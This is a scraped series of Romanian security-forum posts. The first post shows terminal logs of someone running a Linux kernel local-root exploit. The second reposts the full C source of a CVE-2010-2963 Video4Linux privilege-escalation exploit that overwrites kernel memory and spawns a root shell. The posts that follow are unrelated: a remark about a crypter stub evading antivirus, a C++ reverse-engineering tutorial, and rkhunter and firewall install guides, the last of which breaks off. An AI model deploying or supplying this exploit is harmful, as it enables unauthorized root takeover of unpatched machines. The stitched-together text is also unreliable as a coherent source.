Nytro

La mine nu a vrut, pe 2.6.39. Cred ca am si o versiune mai veche, o sa incerc si pe ea. Deocamdata: nytro@rst:~$ whoami nytro nytro@rst:~$ uname -a Linux rst 2.6.39nytro #1 SMP Fri May 20 01:14:36 EEST 2011 i686 GNU/Linux nytro@rst:~$ cd Documents/ nytro@rst:~/Documents$ gcc exploit.c -o exploit exploit.c: In function ‘hollywood_status’: exploit.c:77: warning: left shift count >= width of type exploit.c: In function ‘kernel_write’: exploit.c:104: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint64_t’ nytro@rst:~/Documents$ chmod +x exploit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016ea90 [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0 [*] Exploit payload function pointer at 0x00000000bfcdbf3c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede5eb48 Attacking ... [*] Overwriting at 0xede5eb48 with 0 bytes from 0x4 /dev/video0: No such file or directory nytro@rst:~/Documents$ whoami nytro nytro@rst:~/Documents$ mknod /dev/video0 c 81 0 mknod: `/dev/video0': Permission denied nytro@rst:~/Documents$ su Password: root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0 root@rst:/home/nytro/Documents# exit exit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016ea90 [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0 [*] Exploit payload function pointer at 0x00000000bf87210c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748 Attacking ... [*] Overwriting at 0xede58748 with 0 bytes from 0x4 /dev/video0: Permission denied nytro@rst:~/Documents$ su Password: root@rst:/home/nytro/Documents# chmod 666 /dev/video0 root@rst:/home/nytro/Documents# exit exit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016ea90 [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0 [*] Exploit payload function pointer at 0x00000000bfa9b57c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748 Attacking ... [*] Overwriting at 0xede58748 with 0 bytes from 0x4 /dev/video0: No such device or address nytro@rst:~/Documents$ ls /dev/video* /dev/video0 nytro@rst:~/Documents$ lsmod Module Size Used by videodev 78103 0 binfmt_misc 6420 1 parport_pc 25796 0 ppdev 5064 0 dm_crypt 13696 0 mac80211 246236 0 snd_hda_codec_hdmi 21534 1 snd_hda_codec_realtek 248102 1 snd_hda_intel 21720 2 snd_hda_codec 84130 3 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel snd_hwdep 4984 1 snd_hda_codec snd_pcm 70434 3 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec snd_seq_midi 4364 0 r8192se_pci 445895 0 snd_rawmidi 17462 1 snd_seq_midi joydev 8489 0 snd_seq_midi_event 5959 1 snd_seq_midi cfg80211 145102 1 mac80211 snd_seq 46035 2 snd_seq_midi,snd_seq_midi_event snd_timer 18315 2 snd_pcm,snd_seq snd_seq_device 5562 3 snd_seq_midi,snd_rawmidi,snd_seq snd 48219 14 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device psmouse 61369 0 serio_raw 3776 0 soundcore 888 1 snd snd_page_alloc 7096 2 snd_hda_intel,snd_pcm lp 7085 0 hp_wmi 7204 0 parport 30699 3 parport_pc,ppdev,lp sparse_keymap 3478 1 hp_wmi i915 467399 2 usbhid 34350 0 hid 68860 1 usbhid usb_storage 39698 0 drm_kms_helper 32119 1 i915 drm 183577 3 i915,drm_kms_helper ahci 18634 2 i2c_algo_bit 4913 1 i915 libahci 19882 1 ahci intel_agp 9562 1 i915 intel_gtt 13592 3 i915,intel_agp r8169 36279 0 agpgart 29117 3 drm,intel_agp,intel_gtt video 11166 1 i915 mii 4434 1 r8169 nytro@rst:~/Documents$ Pe o alta versiune (2.6.35): nytro@rst:~$ whoami nytro nytro@rst:~$ lsmod Module Size Used by binfmt_misc 6599 1 vboxnetadp 6454 0 vboxnetflt 15152 0 vboxdrv 190199 2 vboxnetadp,vboxnetflt parport_pc 26058 0 ppdev 5556 0 dm_crypt 11385 0 snd_hda_codec_intelhdmi 9812 1 joydev 8767 0 snd_hda_codec_realtek 218492 1 snd_hda_intel 22235 2 snd_hda_codec 87552 3 snd_hda_codec_intelhdmi,snd_hda_codec_realtek,snd_hda_intel r8192se_pci 469516 0 psmouse 59033 0 serio_raw 4022 0 snd_hwdep 5040 1 snd_hda_codec hp_wmi 5223 0 snd_pcm 71475 2 snd_hda_intel,snd_hda_codec snd_seq_midi 4588 0 mac80211 231959 0 snd_rawmidi 17783 1 snd_seq_midi snd_seq_midi_event 6047 1 snd_seq_midi snd_seq 47174 2 snd_seq_midi,snd_seq_midi_event snd_timer 19067 2 snd_pcm,snd_seq lp 7342 0 snd_seq_device 5744 3 snd_seq_midi,snd_rawmidi,snd_seq snd 49038 13 snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device cfg80211 144694 2 r8192se_pci,mac80211 soundcore 880 1 snd snd_page_alloc 7120 2 snd_hda_intel,snd_pcm parport 31492 3 parport_pc,ppdev,lp dm_raid45 81721 0 xor 15136 1 dm_raid45 i915 295435 3 usbhid 36882 0 drm_kms_helper 30200 1 i915 hid 67742 1 usbhid drm 168060 3 i915,drm_kms_helper usb_storage 40204 0 intel_agp 26566 2 i915 ahci 19198 2 r8169 36521 0 libahci 21728 1 ahci mii 4425 1 r8169 agpgart 32011 2 drm,intel_agp i2c_algo_bit 5168 1 i915 video 18712 1 i915 output 1883 1 video ramzswap 9555 0 lzo_compress 1865 1 ramzswap nytro@rst:~$ cd Documents/ nytro@rst:~/Documents$ ls /dev/video* ls: cannot access /dev/video*: No such file or directory nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016cd40 [*] Resolved prepare_kernel_cred to 0x00000000c016d190 [*] Exploit payload function pointer at 0x00000000bf8dc72c [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048 Attacking ... [*] Overwriting at 0xf415a048 with 0 bytes from 0x4 /dev/video0: No such file or directory nytro@rst:~/Documents$ su Password: root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0 root@rst:/home/nytro/Documents# chmod 666 /dev/video0 root@rst:/home/nytro/Documents# exit exit nytro@rst:~/Documents$ ./exploit Preparing ... [*] Resolved commit_creds to 0x00000000c016cd40 [*] Resolved prepare_kernel_cred to 0x00000000c016d190 [*] Exploit payload function pointer at 0x00000000bfbcabbc [*] Opening trigger socket listener on port 31337 ... [*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048 Attacking ... [*] Overwriting at 0xf415a048 with 0 bytes from 0x4 /dev/video0: No such device or address nytro@rst:~/Documents$ uname -a Linux rst 2.6.35-28-generic #50-Ubuntu SMP Fri Mar 18 19:00:26 UTC 2011 i686 GNU/Linux nytro@rst:~/Documents$ PS: Probabil kernelele mele nu au fost compilate cu suport pentru video4linux. Nu e nimeni cu Ubuntu 10.04 sa incerce asta?

Ubuntu 10.04 (kernel 2.6.36?) - Local Root Privilege Escalation Exploit Nu sunt sigur ca functioneaza. Ma uitam azi pe o prezentare de la Defconf 19 si am dat peste el. E vorba de aceasta problema: CVE - CVE-2010-2963 (under review) drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L) implementation in the Linux kernel before 2.6.36 on 64-bit platforms does not validate the destination of a memory copy operation, which allows local users to write to arbitrary kernel memory locations, and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this device. Info: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2010-2963) Exploit: /* * Stand-alone CVE-2010-2963 exploit, tuned for unpatched Ubuntu 10.04 * Kees Cook <kees@ubuntu.com> * * Thanks to Dan Rosenberg for net target/trigger (with thanks to * netstat authors for INET_DIAG parsing code). * Thanks to Brad Spengler for symbols parser and creds payload. * Greets to pipacs, redpig, nelhage, segoon, taviso, solardiz. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <time.h> #include <sys/wait.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/inet_diag.h> #include <sys/utsname.h> #include <string.h> #include <sys/mman.h> #include <errno.h> #include <netinet/in.h> #include <sys/types.h> #include <linux/videodev.h> #include <syscall.h> /* 32bit __NR_ioctl syscall 54 */ #include <asm/unistd_32.h> #define IOCTL_SYSCALL __NR_ioctl #define PORT 31337 /* Trigger socket, just listens briefly */ #define SOCK_OFFSET 584 /* offsetof(struct sock, sk_destruct) */ #define DEVICE "/dev/video0" unsigned int syscall32(unsigned int syscall, unsigned int arg1, unsigned int arg2, unsigned int arg3) { unsigned int rc; asm volatile( "movl %1, %%ebx;\n" "movl %2, %%ecx;\n" "movl %3, %%edx;\n" "movl %4, %%eax;\n" "int $0x80;\n" "movl %%eax, %0;\n" /* output */ : "=g"(rc) /* input */ : "g"(arg1), "g"(arg2), "g"(arg3), "g"(syscall) /* clobbered registers */ : "%eax", "%ebx", "%ecx", "%edx" ); return rc; } int hollywood = 0; void hollywood_status(char *format, unsigned long value) { unsigned long mask = 0x0; unsigned long drama; int counter; if (!hollywood) { printf(format, value); printf("\n"); return; } for (counter = 0 ; ; counter ++) { drama = ((unsigned long)rand() << (sizeof(int)*8)) | (unsigned long)rand(); printf("\r"); printf(format, (drama & ~mask) | (value & mask)); fflush(NULL); usleep(10000); if (mask == ~0x0UL) break; if (counter % 16 == 0) { mask |= (0xFFUL << ((rand() % sizeof(mask))*8)); } } printf("\n"); } struct video_code32 { char loadwhat[16]; int datasize; int padding; uint64_t data; }; int kernel_write(uint64_t destination, void *source, int length) { static struct video_code32 *vc; static struct video_tuner *tuner; int dev; unsigned int code; printf("[*] Overwriting at 0x%lx with %d bytes from %p\n", destination, length, source); if ( (dev=open(DEVICE, O_RDWR)) < 0) { perror(DEVICE); exit(1); } printf(" - Opened %s\n", DEVICE); if (hollywood) sleep(3); if (!vc) { vc = (struct video_code32*)mmap(NULL, sizeof(*vc), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0); if (vc == MAP_FAILED) { perror("mmap"); exit(1); } } if (!tuner) { tuner = (struct video_tuner*)mmap(NULL, sizeof(*tuner), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0); if (tuner == MAP_FAILED) { perror("mmap"); exit(1); } } vc->datasize = length; vc->data = (uint64_t)(uintptr_t)source; memset(tuner, 0xBB, sizeof(*tuner)); // manual union, since a real union won't do ptrs for 64bit uint64_t *ptr = (uint64_t*)(&(tuner->name[20])); *ptr = destination; printf(" - Spamming VIDIOCSTUNER ioctl ...\n"); // beat memory into the stack... code = 0x40347605; // VIDIOCSTUNER syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner); /* VIDIOCSMICROCODE32, the misconstructed VIDIOCSMICROCODE */ code = 0x4020761b; syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)vc); printf(" - VIDIOCSMICROCODE ioctl completed\n"); return 0; } /* Get the address of the sock struct for our socket */ unsigned long get_sock_addr(unsigned int port) { FILE *f; char buf[1024]; unsigned int testport, a; unsigned long addr, b; f = fopen("/proc/net/tcp", "r"); if (f < 0) { printf("[*] Failed to open /proc/net/tcp\n"); return 0; } while (fgets(buf, 1024, f)) { sscanf(buf, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X " "%02X:%08lX %08X %5d %8d %lu %d %p %lu %lu %u %u " "%d\n", &a, &a, &testport, &a, &a, &a, &a, &a, &a, &b, &a, &a, &a, &b, &a, (void **)&addr, &b, &b, &a, &a, &a); if (testport == port) goto out; } addr = 0; out: fclose(f); return addr; } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) getroot(void * file, void * vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { char *msg; asprintf(&msg, "[*] Resolved %s to 0x%%016lx", name); hollywood_status(msg, addr); free(msg); fclose(f); return addr; } } fclose(f); if (rep) return 0; fallback: /* didn't find the symbol, let's retry with the System.map dedicated to the pointlessness of Russell Coker's SELinux test machine (why does he keep upgrading the kernel if "all necessary security can be provided by SE Linux"?) */ uname(&ver); if (strncmp(ver.release, "2.6", 3)) oldstyle = 1; sprintf(sname, "/boot/System.map-%s", ver.release); f = fopen(sname, "r"); if (f == NULL) return 0; rep = 1; goto repeat; } int sock; unsigned long choose_target() { unsigned long target; struct sockaddr_in addr; printf("[*] Opening trigger socket listener on port %d ...\n", PORT); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { printf("[*] Failed to open trigger socket.\n"); exit(1); } memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = INADDR_ANY; if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) { printf("[*] Failed to bind trigger socket.\n"); exit(1); } /* Our socket won't appear in /proc/net/tcp unless it's listening */ if (listen(sock, 1)) { printf("[*] Failed to listen on trigger socket.\n"); exit(1); } target = get_sock_addr(PORT); if (!target) { printf("[*] Failed to get trigger socket address via INET_DIAG.\n"); exit(1); } target += SOCK_OFFSET; hollywood_status("[*] Trigger struct sock address + offset of sk_destruct: 0x%016lx", target); return target; } void trigger_target() { if (hollywood) sleep(2); printf("[*] Triggering payload...\n"); if (hollywood) sleep(3); close(sock); } unsigned long get_payload_addr(void) { commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); return (uintptr_t)getroot; } int main(int argc, char * argv[]) { unsigned long payload; unsigned long target; srand(time(NULL)); // Hollywood level randomness! if (argc>1 && !strcmp(argv[1],"--hollywood")) hollywood = 1; printf("Preparing ...\n"); payload = get_payload_addr(); hollywood_status("[*] Exploit payload function pointer at 0x%016lx", (uintptr_t)&payload); target = choose_target(); printf("Attacking ...\n"); kernel_write(target, (void*)&payload, sizeof(payload)); trigger_target(); if (getuid()) { printf("[*] Failed to get root.\n"); return -1; } if (hollywood) { printf("[*] *dramatic chord*\n"); sleep(2); } printf("[*] Pwnage complete!\n"); execl("/bin/sh", "sh", NULL); perror("execl"); return 1; } Nu am deocamdata prea multe detalii, daca am timp sa ma informez revin cu informatii.

Poti face ce doresti cu el, poti sa modifici ce vrei, nu va fi nicio problema.

Da, este un fel de versiune imbunatatita a acestuia, dar parca l-am refacut de la 0. Uite Selenity CMS, e un fel de ultima versiune. Il gasesti si aici la RST Power. http://www65.zippyshare.com/v/1073349/file.html Screenshot AdminCP: http://i56.tinypic.com/2ccs4s8.jpg

Pe mine nu ma deranjeaza sa fiu filmat daca ma descurc si iese bine

Trebuie sa facem ceva, ce putem, orice.

E de cel putin 3 ani, arata urat si nu are mai deloc optiuni. Deci nu are rost... Nici nu stiu daca il mai am.

Eu o sa vin

Nu stiu ce ai scanat tu... http://www.virustotal.com/file-scan/report.html?id=5228eae4b11ceed3fad19e591b5c800433783503e615560f0739d4f91e4a2d9b-1315512955 Si asta e cu un fisier simplu si inofensiv cryptat, pentru ca stub-ul e detectabil.

Reversing C++ programs with IDA pro and Hex-rays Introduction During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard. Here’s a sample of what you get with Hex-rays when you start up digging into an interesting function: v81 = 9; v63 = *(_DWORD *)(v62 + 88); if ( v63 ) { v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(v63 + 24); if ( v64 ) v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD *)(v3 + 40), bstrString); } It’s our job to add symbol names, identify classes and set up all the information to help hex-rays in giving us a reliable and certainly understandable output: padding = *Dst; if ( padding < 4 ) return -1; buffer_skip_bytes(this2->decrypted_input_buffer, 5u); buffer_skip_end(this2->decrypted_input_buffer, padding); if ( this2->encrypt_in != null ) { if ( this2->compression_in != null ) { buffer_reinit(this2->compression_buffer_in); packet_decompress(this2, this2->decrypted_input_buffer, this2->compression_buffer_in); buffer_reinit(this2->decrypted_input_buffer); avail_len = buffer_avail_bytes(this2->compression_buffer_in); ptr = buffer_get_data_ptr(this2->compression_buffer_in); buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len); } } packet_type = buffer_get_u8(this2->decrypted_input_buffer); *len = buffer_avail_bytes(this2->decrypted_input_buffer); this2->packet_len = 0; return packet_type; Of course, Hex-rays is not going to invent the names for you, you’ll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help. All my samples here have been compiled either with visual studio or Gnu C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest. Structure of a C++ program It is not my goal to teach you how OOP works, you already know that. We’ll just see how it works (and is implemented) in the big lines. Class = data structure + code (methods). The data structure can only be seen in the source code, when the methods will appear in your favorite disassembler. Object = memory allocation + data + virtual functions. The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions. Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it). Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let’s go back to the bits and bytes. Object creation int __cdecl sub_80486E4() { void *v0; // ebx@1 v0 = (void *)operator new(8); sub_8048846(v0); (**(void (__cdecl ***)(void *))v0)(v0); if ( v0 ) (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0); return 0; } Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables. The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor. The next function call is a little cryptic. It’s doing two pointer deferences on v0 before calling it. It’s a virtual function call. All polymorphic objects have a special pointer in their variables, called the vtable. This table contains addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This could no stay true for multiple inheritance. I did not test). Let’s do some IDA magic: Rename the symbols Just click on a name, press « n » and give a meaningful name. Since we don’t know yet what our class do, I suggest we name the class « class1 », and use this convention until we’ve understood what our class do. It’s very possible that we’re going to discover other classes before we finished digging class1, so I suggest we simply continue naming classes as we find them. int __cdecl main() { void *v0; // ebx@1 v0 = (void *)operator new(8); class1::ctor(v0); (**(void (__cdecl ***)(void *))v0)(v0); if ( v0 ) (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0); return 0; } Create structures The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures. Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here ! Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result. Create a new structure, of 12 bytes, and call it « class1_vtable ». At this state, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1’s declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic. We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here’s a counterexample. It is time to analyze the constructor. Analysis of the constructor int __cdecl class1::ctor(void *a1) { sub_80487B8(a1); *(_DWORD *)a1 = &off_8048A38; return puts("B:()"); } You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class. « sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class. « off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big is our vtable (just watch the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes. It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view. The strange call in the constructor int __cdecl sub_80487B8(int a1) { int result; // eax@1 *(_DWORD *)a1 = &off_8048A50; puts("A::A()"); result = a1; *(_DWORD *)(a1 + 4) = 42; return result; } The call to the « sub_80487b8() » function in the constructor reveals us the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we’re in yet another constructor. Don’t retype the type « class1 » for argument « a1 », since we’re not dealing with class1. We found a new class, that we will call « class2 ». This class is a superclass of class1. Let’s do the same work as in class1. The only difference it that we do not know exactly the size of its member. There are two ways of figuring it out: Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members. Look at the methods in the vtable, and try to guess what’s the highest member ever accessed. In our case, « class2 ::ctor » accesses the 4 bytes after the 4 first ones and set it to 42. Since its child-class « class1 » is 8 bytes long, so is « class2 ». Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children. Study of the destructors Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it. if ( v0 ) ((void (__cdecl *)(class1 *)) v0->vtable->method_3)(v0); … void __cdecl class1::m3(class1 *a1) { class1::m2(a1); operator delete(a1); } … void __cdecl class1::m2(class1 *a1) { a1->vtable = (class1_vtable *)&class1__vtable; puts("B::~B()"); class2::m2((class2 *)a1); } … void __cdecl class2::m2(class2 *a1) { a1->vtable = (class2_vtable *)&class2__vtable; puts("A::~A()"); } What we can see here is the following: class1 ::m3 is a destructor, which calls class1 ::m2 which is the main destructor of class1. What this destructor do is ensure that we’re well in « class1 » context, by setting back the vtable to is « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes in the way. Hey, what are all these casts? Why do I have two structures defining the same fields? What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields: For each class, define a classXX_members, classXX_vtable, classXX structure. classXX contains +++ vtable (typed to classXX_vtable *) +++ classXX-1_members (members of the superclass) +++ classXX_members, if any classXX_vtable contains +++classXX-1_vtable +++classXX’s vptrs, if any Ideally, you should start from the main class to the children, until you end up in an edge class. In our exemple, here’s the « solution » of our sample: 00000000 class1 struc ; (sizeof=0x8) 00000000 vtable dd ? ; offset 00000004 class2_members class2_members ? 00000008 class1 ends 00000008 00000000 ; ----------------------------------------------00000000 00000000 class1_members struc ; (sizeof=0x0) 00000000 class1_members ends 00000000 00000000 ; ----------------------------------------------00000000 00000000 class1_vtable struc ; (sizeof=0xC) 00000000 class2_vtable class2_vtable ? 0000000C class1_vtable ends 0000000C 00000000 ; ----------------------------------------------00000000 00000000 class2 struc ; (sizeof=0x8) 00000000 vtable dd ? ; offset 00000004 members class2_members ? 00000008 class2 ends 00000008 00000000 ; ----------------------------------------------00000000 00000000 class2_vtable struc ; (sizeof=0xC) 00000000 method_1 dd ? ; offset 00000004 dtor dd ? ; offset 00000008 delete dd ? ; offset 0000000C class2_vtable ends 0000000C 00000000 ; ----------------------------------------------00000000 00000000 class2_members struc ; (sizeof=0x4) 00000000 field_0 dd ? 00000004 class2_members ends 00000004 int __cdecl main() { class1 *v0; // ebx@1 v0 = (class1 *)operator new(8); class1::ctor(v0); ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0); if ( v0 ) ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0); return 0; } int __cdecl class1::ctor(class1 *a1) { class2::ctor((class2 *)a1); a1->vtable = (class1_vtable *)&class1__vtable; return puts("B:()"); } class2 *__cdecl class2::ctor(class2 *a1) { class2 *result; // eax@1 a1->vtable = (class2_vtable *)&class2__vtable; puts("A::A()"); result = a1; a1->members.field_0 = 42; return result; } In brief When you find a new class, give a symbolic name, and resolve the whole tree before figuring out what should be its real name Start from the ancestor and go up to the children Look at the constructors and destructors first, check out the references to new() and static methods. Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes, the constructors are inlined in childclasses constructors, or even at the place of the instantiation. If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variable only once. Use and abuse Hex-rays’ typing system, it’s very powerful. Pure virtual classes are hell : you can find several classes having similar vtables, but no code in common. Beware of them. Sources Try this at home ! The binary (elf32 stripped) The source file. Don’t open it too fast ! Sursa: Reversing C++ programs with IDA pro and Hex-rays at Aris' Blog - Computers, ssh and rock'n roll

Hardening Windows Applications olleB - olle @ toolcrypt.org About this document This paper is aimed at Windows developers in the hope of explaining how Windows' security features can be used to better secure their applications. It is not a complete guide to the Windows security model and may skip details that were deemed unimportant at the time of writing. Please bear that in mind while reading. Thank you. Introduction to Windows security In this introductory chapter some basic concepts of the Windows security model are explained in just enough detail to understand the material presented in the following chapters. If you are already familiar with how the Windows model of access control works, feel free to skip ahead and use this chapter for reference only. Another great reference is the MSDN section on Access Control available at Access Control (Windows). Download: https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf

Install RKHunter Product Name: RKHunter Product Version: 1.3.6 Homepage: Rootkit.nl - Protect your machine Description: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and possible local exploits. It does this by comparing MD5 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD. Step 1: Downloading, Installing and Updateing cd /usr/local/src wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz.sha1.txt sha1sum -c rkhunter-1.3.6.tar.gz.sha1.txt tar -zxvf rkhunter-1.3.6.tar.gz cd rkhunter-1.3.6 ./installer.sh --layout default --install /usr/local/bin/rkhunter --update /usr/local/bin/rkhunter --propupd rm -Rf /usr/local/src/rkhunter* cd Step 2: Adding daily cron job Step 2.1: Create run-file nano -w /etc/cron.daily/rkhunter.sh Step 2.2: Add this text to rkhunter.sh #!/bin/sh ( /usr/local/bin/rkhunter --versioncheck /usr/local/bin/rkhunter --update /usr/local/bin/rkhunter --cronjob --report-warnings-only ) | /bin/mail -s 'rkhunter Daily Run (PutYourServerNameHere)' your@email.here REMEMBER TO CHANGE (PutYourServerNameHere) AND your@email.here Step 2.3: Chmod rkhunter.sh to root only chmod 700 /etc/cron.daily/rkhunter.sh There you go! should be installed, and you will get a mail daily with a status on your system Sursa: Install RKHunter | SecureCentos.com

Install Firewall Guide for installing CSF Firewall will come later.. APF is used because its the site admins favorite, and its stable and simple to setup. Might be better for new guys? Fuel for discussion Product Name: APF (Advanced Firewall Policy) Product Version: 0.9.7 rev:1 Homepage: Advanced Policy Firewall | R-fx Networks Description: Advanced Policy Firewall (APF) is an iptables(netfilter) based firewall system designed around the essential needs of todays Internet deployed servers and the unique needs of custom deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy to follow process, from top to bottom of the configuration file. The management of APF on a day-to-day basis is conducted from the command line with the apf command, which includes detailed usage information and all the features one would expect from a current and forward thinking firewall solution. Pre Setup: Make sure iptables are installed yum install iptables* -y Step 1: Download, unpack, install of APF from source. cd /usr/local/src wget http://www.rfxn.com/downloads/apf-current.tar.gz tar -zxf apf-current.tar.gz cd apf-9* ./install.sh Step 1.1: Cleanup source install files. rm -Rf /usr/local/src/apf-9* && cd Step 2: Backup orginal apf config cp /etc/apf/conf.apf /etc/apf/conf.apf.bak Step 3: Edit current APF Config nano -w 